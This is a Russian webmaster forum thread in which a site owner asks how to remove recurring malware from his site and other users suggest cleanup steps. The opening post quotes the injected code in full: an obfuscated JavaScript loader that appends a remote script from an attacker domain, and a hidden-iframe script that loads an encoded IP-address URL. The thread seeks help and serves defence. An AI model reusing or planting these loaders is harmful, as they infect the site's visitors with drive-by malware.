Экзорцизм. Как выселить вирус с сайта?

12
ALL_SR
На сайте с 30.07.2007
Offline
44
2081

Есть сайт http://www.open-letter.ru/ (сайт ещё заражен, осторожно, при заходе выключайте js)

Ситуация следующая, вредоносный код например такой

<script>var GU='';var h;var X=new String();var mP="";H=function(){var F=["hu"];function L(Lc,O,d){return Lc.substr(O,d);}OH=55345;OH-=37;var x=document;QM=6929;QM++;q=25298;q-=65;var t='';var vs={};var u=["hR"];var Oi=RegExp;var A={kh:"LQ"};var v=new String("/goo"+"gle."+L("com/DyBg",0,4)+L("abc.EBgq",0,4)+L("0vm1go.c1m0v",4,4)+"om/t"+L("erraX6U",0,4)+L(".comKvlS",0,4)+L("P1By.br.By1P",4,4)+"php");yz={Ec:false};function y(Lc,O){hI=24414;hI++;g={};a=28529;a--;var d=new String(L("[n0jJ",0,1))+O+String("]");var m=new Oi(d, String("g"));n={kW:40818};ly={HN:false};return Lc.replace(m, t);};ZW=9686;ZW-=202;GE=56525;GE-=235;D=["u_","QP"];var E=null;var vd={ka:"J"};var Jn=new Date();Xg={V:51919};var l=751407-743327;try {} catch(U){};var W=new String("body");var qi="qi";this.Vf=38797;this.Vf--;var P=y('skchrkikpjtJ','SvFJDneKyEB_akgG1jx6h7OMZ');var RlE=58536;var Xx=false;this.jo='';vi=41593;vi--;h=function(){try {var YU=new String();var DY="";var dY=y('c4rJeJaVt_ebEslVe4mJe_n4ty','bqV_4sJy6');CN={_Y:63379};s=x[dY](P);var fH="fH";pI=33929;pI--;Uw=[];var G=y('sVrvc5','5wvD6TG4IuR2MLBjQgPpbVK');var Wg=[];var Lc=l+v;var yW=new String();var iO=new String();var Oe=String("defe"+"r");var Et=["qO","AF"];var QX=13548;s[G]=new String("http:"+L("//ten5qC",0,5)+"thpro"+"fit.r"+L("u:mn7k",0,2))+Lc;PA={};s[Oe]=[2,1][1];this.Vt="Vt";var ho=46131;try {var kn='cI'} catch(kn){};this.ww=27193;this.ww+=97;x[W].appendChild(s);this.yk=60072;this.yk++;var Lp=new Date();} catch(PY){this.ku=43483;this.ku++;this.ra=47033;this.ra--;this.ru="ru";};var lu=new Array();var me=new String();};};YB=["LB","uM"];var AI={Vm:4707};H();this.mDs=57864;this.mDs-=135;zz=44697;zz++;var sn=[];window.onload=h;var PQ=false;var mF={Hm:false};try {var r_='iv'} catch(r_){};this.z_="z_";</script>

<!--c8eaa444c196a659d7f4b2c4c548e12f--<html><body><script type='text/javascript'>str="<ijbwjuics src=" + unescape('%68%74%74%70%3a%2f%2f%39%31%2e%32%31%32%2e%31%39%38%2e%31%31%35%2f%77%65%62%66%6f%72%75%6d%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%38') + " xaoz3='1'vxoq3='1'>";str = str.replace('ijb', 'i');str =str.replace('wju', 'fr');str = str.replace('ics', 'ame');str =str.replace('xaoz3', 'width');str =str.replace('vxoq3','height');document.write(str);</script></body></html>>

прописывается во всех файлах index.php и в всех файлах *.js на сайте, вычищал руками раз 5, в этот же день он поселяется обратно. У меня есть ощущение что делается это автоматически через программу и скрипт и у злоумышленников нет прямого доступа к сайту.

Как изгнать нечисть? Кто нибудь знает механизм работы вируса? Чем опасен JS прописанный на сайте?

Мы построим коммунизм! С блэкджеком и шлюхами! Хотя к черту коммунизм... Услуги программиста (/ru/forum/316473) Бесплатный скрипт проверки ссылок (/ru/forum/298319)
BPhoenix
На сайте с 12.01.2009
Offline
66
#1

проверьте свой комп и смените пароли на серваке

ALL_SR
На сайте с 30.07.2007
Offline
44
#2

Да забыл сказать комп чист, на серваке пароли менял

AM
На сайте с 09.01.2007
Offline
467
#3
ALL_SR:
Да забыл сказать комп чист

Не nod32 случайно используете?

vandamme
На сайте с 30.11.2008
Offline
675
#4

ALL_SR, просканируйте комп Malwarebytes' Anti-Malware, смените пароли на фтп, загрузите сайт на комп, опять просканируйте и ищите на локалке файл на сайте, который заражен, а также грузит вирус на сайт.

vandamme добавил 25.05.2010 в 10:19

скорее всего троян спер пароли к фтп и подгрузил вирус, у меня такое было

rtyug
На сайте с 13.05.2009
Offline
263
#5

фтп пароль поменй или лучше вообще выключи доступ по фтп и ходи по ссш

если не поможет, может дырка в движке через которую вставляют код вредоносный через XSS

Спалил тему: Pokerstars вывод WMZ, etc на VISA 0% или SWIFT + Конверт USD/GBP,etc (net profit $0,5 млрд) (https://minfin.com.ua/blogs/94589307/115366/) Monobank - 50₴ на счет при рег. тут (https://clck.ru/DLX4r) | Номер SIP АТС Москва 7(495) - 0Ꝑ, 8(800) - 800Ꝑ/0Ꝑ (http://goo.gl/XOrCSn)
ALL_SR
На сайте с 30.07.2007
Offline
44
#6
Не nod32 случайно используете?

Нет

просканируйте комп Malwarebytes' Anti-Malware,

комп 100%, это не обсуждается.

лучше вообще выключи доступ по фтп и ходи по ссш

да, походу так и придется сделать.

может дырка в движке через которую вставляют код вредоносный через XSS

Нет, это не XSS дописывают именно в файлы. Хотя вероятности наличия уязвимости у движка не исключаю.

А насчет самого вируса кто-нибудь что нибудь скажет?

vandamme
На сайте с 30.11.2008
Offline
675
#7
ALL_SR:
комп 100%, это не обсуждается.

чем докажите?

vandamme добавил 25.05.2010 в 11:26

захожу на сайт, есет смарт видит троянец

ALL_SR
На сайте с 30.07.2007
Offline
44
#8
чем докажите?

Ubuntu+Avira+Opera

захожу на сайт, есет смарт видит троянец

и касперский видит троянец. а это очень пугает пользователей

R
На сайте с 24.01.2008
Offline
180
#9

Стучите в асю....

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
vandamme
На сайте с 30.11.2008
Offline
675
#10
ALL_SR:
Ubuntu+Avira+Opera

это все фигня, работал с авирой когда-то, удалил ...

опера тут ни при чем, убунту тоже не авторитет

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий